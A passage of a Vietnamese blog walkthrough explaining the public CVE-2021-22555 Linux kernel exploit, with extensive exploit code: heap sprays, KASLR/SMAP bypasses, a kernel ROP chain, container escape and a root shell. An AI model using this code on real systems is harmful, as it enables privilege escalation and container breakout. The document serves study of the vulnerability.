  data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad));
  strcpy(data.match.u.user.name, "icmp");
  data.match.u.user.revision = 0;

  data.target.u.user.target_size = sizeof(data.target);
  strcpy(data.target.u.user.name, "NFQUEUE");
  data.target.u.user.revision = 1;

  // Partially overwrite the adjacent buffer with 2 bytes of zero.
  if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) {
    if (errno == ENOPROTOOPT) {
      printf("[-] Error ip_tables module is not loaded.\n");
      return -1;
    }
  }

  return 0;
}

Hàm trigger_oob_write mục đích là kích hoạt lỗi heap out-of-bound được để cập ở trên. Hàm setsockopt được gọi là dòng 29 có optname là IPT_SO_SET_REPLACE kết hợp với tùy chọn CAP_NET_ADMIN khi tạo docker sẽ kích hoạt hàm xt_compat_target_from_user() - hàm chứa lỗi heap-out-of-bound.
Dòng 25 tác giả sử dụng cấu trúc NFQUEUE để kiểm soát giá trị của target->targetsize.
Về cấu trúc của data, tôi vẫn chưa thực sự hiểu. Ở đây, tác giả dùng khai báo struct __attribute__((__packed__)) để cho phép cấu trúc của data có kích thước nhỏ hơn bằng bằng kích thước align (memory alignment); các cấu trúc ipt_* là các cấu trúc được sử dụng trong netfilter và có mối quan hệ như hình bên:
.

Searching for corrupted primary message

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


 printf("[*] Searching for corrupted primary message...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i != 0 && (i % HOLE_STEP) == 0)
      continue;
    if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
      printf("[-] Error could not corrupt any primary message.\n");
      goto err_no_rmid;
    }
    if (*(int *)&msg_secondary.mtext[4] != i) {
      fake_idx = i;
      real_idx = *(int *)&msg_secondary.mtext[4];
      break;
    }
  }

  if (fake_idx == -1 && real_idx == -1) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;
  }

  // fake_idx's primary message has a corrupted next pointer; wrongly
  // pointing to real_idx's secondary message.
  printf("[+] fake_idx: %x\n", fake_idx);
  printf("[+] real_idx: %x\n", real_idx);

Dùng vòng for từ dòng 2-10 để kiểm tra tất cả các message đã được cấp phát
Hàm peek_msg() để đọc giá trị của các message và lưu vào msg_secondary, được định nghĩa như sau:

1
2
3
4
5
6
7
8


int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, MSG_COPY | IPC_NOWAIT) <
      0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}

Khá giống với hàm read_msg đều gọi hàm msgrcv, điểm khác biệt duy nhất là msgflg có giá trị là MSG_COPY | IPC_NOWAIT

Dòng 11-15 , dùng giá trị của msg_secondary.mtext[4] để kiểm tra xem liệu có xuất hiện trường hợp 2 cấu trúc cùng tham khảo đến một địa chỉ hay không. Ở bước khởi tạo, chúng ta gán mỗi giá trị msg_secondary.mtext[4] là một giá trị chỉ số i tương ứng, trong bước này, nếu tồn tại một message có msg_secondary.mtext[4] khác với chỉ số tương ứng của nó, điều đó có nghĩa message này đang trỏ tới một cấu trúc khác trên primary_message.

STAGE 2: SMAP bypass

Freeing real secondary message…

1
2
3
4


  printf("[*] Freeing real secondary message...\n");
  if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary),
               MTYPE_SECONDARY) < 0)
    goto err_rmid;

Giống như những stage trước, để giải phóng các messages đã được cấp phát, ta dùng lệnh read_msg để đọc message rồi giải phóng vùng nhớ đó.

Spraying fake secondary messages…

1
2
3
4
5


memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
            PAGE_SIZE - MSG_MSG_SIZE, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

Sau khi đã giải phóng message gốc, chúng ta tạo ra một fake secondary message thông qua hàm build_msg_msg:

1
2
3
4
5
6
7
8
9


void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next,
                   uint64_t m_list_prev, uint64_t m_ts, uint64_t next) {
  msg->m_list_next = m_list_next;
  msg->m_list_prev = m_list_prev;
  msg->m_type = MTYPE_FAKE;
  msg->m_ts = m_ts;
  msg->next = next;
  msg->security = 0;
}

Tiến hành spray cấu trúc skbuff bằng lệnh skbuff:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (write(ss[i][0], buf, size) < 0) {
        perror("[-] write");
        return -1;
      }
    }
  }
  return 0;
}

skbuff là một nguyên liệu tuyệt vời để tạo UAF, thao tác này làm cho cấu trúc skbuf trỏ tới fake message của chúng ta. Khi chúng ta giải phóng fake message, cấu trúc sk_buff vẫn còn và trỏ tới vị trí fake_message của mình.
Để thực hiện spray, ta dùng hai vòng for, vòng thứ nhất đi qua tất cả các cặp SOCKETS được khởi tạo, vòng thứ 2 đi qua tất cả các cấu trúc sk_buff đang có trên mỗi cặp socket rồi dùng lệnh write để cấp phát và ghi nội dung fake secondary message của chúng ta.

Leaking adjacent secondary message

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


// Use the fake secondary message to read out-of-bounds.
  printf("[*] Leaking adjacent secondary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;

  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak adjacent secondary message.\n");
    goto err_rmid;
  }

  // The secondary message contains a pointer to the primary message.
  msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (PRIMARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);

  if ((kheap_addr & 0xFFFF000000000000) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }

Sau khi spray để cấu trúc sk_buff trỏ đến fake message, ta cần leak địa chỉ của secondary message kế tiếp. Ta cần địa chỉ này để có thể giải phóng vùng nhớ tại đó. Với cấu trúc của msg_fake là:

1
2
3
4


struct {
  long mtype;
  char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;

Ở đây, mtext được cấp phát với kích thước là PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE,

1
2
3
4


#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))
struct msg_msgseg {
  uint64_t next;
};

Dùng hàm peek_msg để lấy fake_message tại index fake_idx, lưu vào msg_fake.
Câu lệnh ở dòng 7 để đám bảo rằng message chúng ta lấy ra là fake_message. Vì tất cả các message gốc, khi khởi tạo đều gán giá trị tại msg/mtext[SECONDARY_SIZE] = MSG_TAG.
Trong cấu trúc struct msg_msg có một trường là m_ts được sử dụng để xác định kích thước dữ liệu trả lại cho user với kích thước gốc là 1024-sizeof(struct msg_msg). Tuy nhiên, chúng ta đã cấp phát với PAGESIZE = 4096 do đó, kích thước này có giá trị là 4096 - sizeof(struct msg_msg). Chính điều này cho phép chúng ta đọc được giá trị của cấu trúc liền kề.
Do đó, tại dòng 13 lấy địa chỉ của cấu trúc msg_msg tiếp theo từ msg_fake. Sau đó, lấy địa chỉ của trường m_list_next và lưu vào kheap_addr.
Vì kheap_addr là nơi bắt đầu của các primary message nên nó sẽ là bội của PRIMARY_SIZE, phép toán kheap_addr & (PRIMARY_SIZE - 1) ở dòng 15 tương đương với kheap_addr mod PRIMARY_SIZE để kiểm tra xem m_list_next có phải là địa chỉ của message kế tiếp không, nếu không phải thì nó sẽ được gán giá trị m_list_prev.
Câu lệnh if ở dòng 19-22 để kiểm tra xem địa chỉ của chúng ta có hợp lệ không.

Freeing fake secondary messages…

1
2


  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], buf, size) < 0) {
        perror("[-] read");
        return -1;
      }
    }
  }
  return 0;
}

Bước tiếp theo giải phóng vùng nhớ fake_secondary messages. Tương tự như hàm spray_skbuff, hàm free_skbuff dùng 2 vòng for để đi qua tất cả các cặp sockets và tất cả các cấu trúc sk_buff trên từng cặp socker để đọc dữ liệu từ vùng nhớ đã được ghi vào ss bằng lệnh read. Lệnh read sau đi đọc xong sẽ tiến hành giải phòng vùng nhớ này Và đừng quên, cấu trúc sk_buff trỏ vào vùng nhớ vừa được giải phóng vẫn còn tồn tại.

Spraying fake secondary messages…

1
2
3
4
5
6
7
8


  // Put kheap_addr at next to leak its content. Assumes zero bytes before
  // kheap_addr.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
                sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

Chúng ta xây dựng lại một fake secondary message, nhưng lần này, chúng ta xây dựng với msg->next = kheap_addr - MSG_MSGSEG_SIZE, với kheap_addr là địa chỉ được leak từ step trước. Ta tiến hành spray bằng lệnh spray_skbuff.

Leaking primary message…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24


// Use the fake secondary message to read from kheap_addr.
  printf("[*] Leaking primary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;

  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak primary message.\n");
    goto err_rmid;
  }

  // The primary message contains a pointer to the secondary message.
  msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (SECONDARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;

  // Calculate the address of the fake secondary message.
  kheap_addr -= SECONDARY_SIZE;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);

  if ((kheap_addr & 0xFFFF00000000FFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;

Bước này căn bản giống với thao tác lấy địa chỉ của primary message truocs đó, điểm khác suy nhất là chúng ta cấu trúc msg_msg được lấy ra từ địa chỉ PAGE_SIZE-MSG_MSG_SIZE

STAGE 3: KASLR bypass

Freeing fake secondary messages…

Bước này đơn gian gọi lại hàm free_skbuff để giải phóng vùng nhớ của fake secondary messages.

1
2


  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

Spraying fake secondary messages…

1
2
3
4
5
6


  // Put kheap_addr at m_list_next & m_list_prev so that list_del() is possible.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, kheap_addr, kheap_addr, 0, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

Chúng ta xây dựng cấu trúc msg_msg mới mà ở đó, m_list_next và m_list_prev cùng trỏ về 1 địa chỉ là kheap_buff

Freeing sk_buff data buffer…

1
2
3


  printf("[*] Freeing sk_buff data buffer...\n");
  if (read_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
    goto err_rmid;

Giải phóng vùng nhớ mà sk_buff trỏ tới bằng lệnh read_msg

Spraying pipe_buffer objects…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


  printf("[*] Spraying pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (pipe(pipefd[i]) < 0) {
      perror("[-] pipe");
      goto err_rmid;
    }
    // Write something to populate pipe_buffer.
    if (write(pipefd[i][1], "pwn", 3) < 0) {
      perror("[-] write");
      goto err_rmid;
    }
  }

Khi pipe được gọi, nó sẽ gọi hàm alloc_pipe_info() để cấp phát các vùng nhớ với cấu trúc là struct pipe_buffer

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
struct pipe_inode_info *alloc_pipe_info(void)
{
    ...
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    ...
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    if (pipe == NULL)
        goto out_free_uid;
    ...
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
                 GFP_KERNEL_ACCOUNT);
    ...
}

và cấu trúc của struct pipe_buffer:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    ...
    /*
     * When the contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    ...
};

chứa con trỏ trỏ tới pipe_buf_operation. Mặt khác, khi được cấp phát, ops sẽ trỏ tới một static struct anon_pipe_buf_ops. Cấu trúc này nằm trong vùng .data:

1
2
3
4
5
6


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
    .release    = anon_pipe_buf_release,
    .try_steal  = anon_pipe_buf_try_steal,
    .get        = generic_pipe_buf_get,
};

Vì khoảng cách từ .data với .text luôn không đổi, nên từ địa chỉ anon_pipe_buf_ops chúng ta có thể tính kernel base address. Vì vậy, chúng ta spray để cấp phát các cấu trúc pipe_buffer với mục tiêu 1 cấu trúc sẽ nằm ngay vị trí được struct sk_buff trỏ tới vừa được giải phóng ở bước trước.
bypass_k_1

Leaking and freeing pipe_buffer object…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


  printf("[*] Leaking and freeing pipe_buffer object...\n");
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
        perror("[-] read");
        goto err_rmid;
      }
      if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
        pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
    }
  }

  kbase_addr = pipe_buffer_ops - ANON_PIPE_BUF_OPS;
  printf("[+] anon_pipe_buf_ops: %" PRIx64 "\n", pipe_buffer_ops);
  printf("[+] kbase_addr: %" PRIx64 "\n", kbase_addr);

  if ((kbase_addr & 0xFFFF0000000FFFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel base address is incorrect.\n");
    goto err_rmid;
  }

Chúng ta dùng 2 vòng for để đi qua tất cả các vùng nhớ mà sk_buff trỏ tới, tại đây, ta đọc dữ liệu, lưu vào vùng đệm secondary_buf tại dòng 4. Tại dòng số 8 kiểm tra để xác tìm vùng nhớ mà chúng ta muốn. MTYPE_FAKE là giá trị được gán cho msg->mtype khi chúng ta tạo fake_msg_msg từ hàm build_msg_msg. Do đó, vùng nhớ nào có giá trị tại secondary_buf[0x10] khác với MTYPE_FAKE chính là vùng nhớ chúng của pipe_buffer mà chúng ta spray được.
Ta lấy địa chỉ của vùng nhớ này tại dòng 9 và lưu vào biến pipe_buffer_ops
kbase_addr được tín từ công thức ở dòng 13, trong đó:

Để tính ANON_PIPE_BUF_OPS ta tính lấy địa chỉ anon_pipe_buf_ops và _text trong file /proc/kallsyms:

1
2
3
4
5


root@ubuntu:/home/edisc/Desktop/cve-2021-22555/security-research/pocs/linux/cve-2021-22555# cat /proc/kallsyms | grep anon_pipe_buf_ops
ffffffff9c878380 r anon_pipe_buf_ops  

root@ubuntu:/home/edisc/Desktop/cve-2021-22555/security-research/pocs/linux/cve-2021-22555# cat /proc/kallsyms | grep _text 
ffffffff9b800000 T _text

ANON_PIPE_BUF_OPS = anon_pipe_buf_ops - _text

STAGE 4: Kernel code execution

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39


  printf("[+] STAGE 4: Kernel code execution\n");

  printf("[*] Spraying fake pipe_buffer objects...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  buf = (struct pipe_buffer *)&secondary_buf;
  buf->ops = kheap_addr + 0x290;
  ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
#ifdef KERNEL_COS_5_4_89
  // RAX points to &buf->ops.
  // RCX points to &buf.
  ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX;
#elif KERNEL_UBUNTU_5_8_0_48
  // RSI points to &buf.
  ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
#endif
  build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  // Trigger pipe_release().
  printf("[*] Releasing pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (close(pipefd[i][0]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
    if (close(pipefd[i][1]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
  }

  printf("[*] Checking for root...\n");
  if ((fd = open("/etc/shadow", O_RDONLY)) < 0) {
    printf("[-] Error could not gain root privileges.\n");
    goto err_rmid;
  }
  close(fd);
  printf("[+] Root privileges gained.\n");

Spraying fake pipe_buffer objects…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


  printf("[*] Spraying fake pipe_buffer objects...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  buf = (struct pipe_buffer *)&secondary_buf;
  buf->ops = kheap_addr + 0x290;
  ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
#ifdef KERNEL_COS_5_4_89
  // RAX points to &buf->ops.
  // RCX points to &buf.
  ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX;
#elif KERNEL_UBUNTU_5_8_0_48
  // RSI points to &buf.
  ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
#endif
  build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

Chúng ta tạo một fake pipe_buffer objects với kheap_addr + 0x290.
Tiếp theo, dòng 6-9 dùng cho centos 5.4.89 và dòng 10-13 cho ubuntu 5.8.0.48
Xây dựng một kernel rop lưu vào secondary_buf và dùng lệnh spray_skbuff để đưa kernel_rop của chúng ta vào vùng nhớ để thực thi.
Hàm build_krop được xây dựng như sau:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95



// Note: Must not touch offset 0x10-0x18.
void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) {
  uint64_t *rop;
#ifdef KERNEL_COS_5_4_89
  *(uint64_t *)&buf[0x00] = kbase_addr + POP_RSP_POP_RBX_RET;

  rop = (uint64_t *)&buf[0x18];

  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R14
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R14
  *rop++ = 0xDEADBEEF; // RBP

  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1; // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + COMMIT_CREDS;

  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1; // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;

  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0x25; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_25_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#elif KERNEL_UBUNTU_5_8_0_48
  *(uint64_t *)&buf[0x39] = kbase_addr + POP_RSP_RET;
  *(uint64_t *)&buf[0x00] = kbase_addr + ADD_RSP_D0_RET;

  rop = (uint64_t *)&buf[0xD8];

  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R12
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R12
  *rop++ = 0xDEADBEEF; // RBP

  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + COMMIT_CREDS;

  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;

  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0xA; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_A_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#endif
}

Nguyên tắc hoạt động của Kernel ROP chain là:

Lưu giá trị của RBP tại một số scratchpad address (scratchpad giống như một mẫu giấy ghi chú để lưu trữ những kiến thức tạm thời khi bạn đọc 1 cuốn sách) để sau này sử dụng.
Gọi hàm commit_creds(prepare_kernel_cred(NULL)) để cài đặt kernel credentials
Gọi hàm switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) để chuyển không gian tên namespace của process 1 thành một trong những init process.
Khôi phục lại giá trị của RBP và quay lại luồng thực thi cũ (ngay sau hàm free_pipe_info())

Releasing pipe_buffer objects…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


 // Trigger pipe_release().
  printf("[*] Releasing pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (close(pipefd[i][0]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
    if (close(pipefd[i][1]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
  }

  printf("[*] Checking for root...\n");
  if ((fd = open("/etc/shadow", O_RDONLY)) < 0) {
    printf("[-] Error could not gain root privileges.\n");
    goto err_rmid;
  }
  close(fd);
  printf("[+] Root privileges gained.\n");

  printf("\n");

Sau khi đã xây dựng xong kernel_rop, chúng ta tiến hành giải phóng các vùng nhớ pipe_buffer để kích hoạt hàm pipe_release(). Bước này ta dùng vòng for để đi qua hết tất cả các pipe filedescriptor và dùng lệnh close để giải phóng vùng nhớ.
dòng lệnh 33-38 dùng để kiểm tra xem liệu chúng ta đã lấy được root hay chưa vì tệp /etc/shadow chỉ được đọc bởi root.

STAGE 5: Post-exploitation

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29


 printf("[+] STAGE 5: Post-exploitation\n");

  printf("[*] Escaping container...\n");
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  printf("[*] Cleaning up...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    // TODO: Fix next pointer.
    if (i == fake_idx)
      continue;
    if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
      perror("[-] msgctl");
  }
  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (close(ss[i][0]) < 0)
      perror("[-] close");
    if (close(ss[i][1]) < 0)
      perror("[-] close");
  }
  if (close(s) < 0)
    perror("[-] close");

  printf("[*] Popping root shell...\n");
  char *args[] = {"/bin/bash", "-i", NULL};
  execve(args[0], args, NULL);

  return 0;

Đây là đoạn lệnh cho phép chúng ta thoát khỏi docker. Khi đã có root, chúng ta tiến hành thay đổi mnt, pid, net namespace để cho phép chúng ta thoát khỏi container. Đoạn lệnh 4-6 thực hiện sự thay đổi này.
Đoạn lệnh từ dòng 8-23 thực hiện thao tác dọn dẹp các message queue, đóng tất cả các socketpair.
Cuối cùng thực hiện lệnh để chạy shell của root dòng 25-27

Tóm lại

Bài này tôi chỉ viết lại từ bài viết chính của tác giả, thêm vào đó, là những giải thích của tôi về những vấn đề tác giả chưa nói rõ hoặc quá căn bản với tác giả nhưng không hề với tôi.
Vì kiến thức tôi còn hạn chế, nên những giải thích có thể đúng hoặc sai, nếu sai, rất mong nhận được sự góp để hoàn thiện hơn.
Lời cuối, chân thành cảm ơn sự cống hiến của tác giả - Andy Nguyen (theflow@) - đặc biệt poc của anh, đã giúp tôi rất nhiều trong quá trình nâng cao kĩ năng của mình.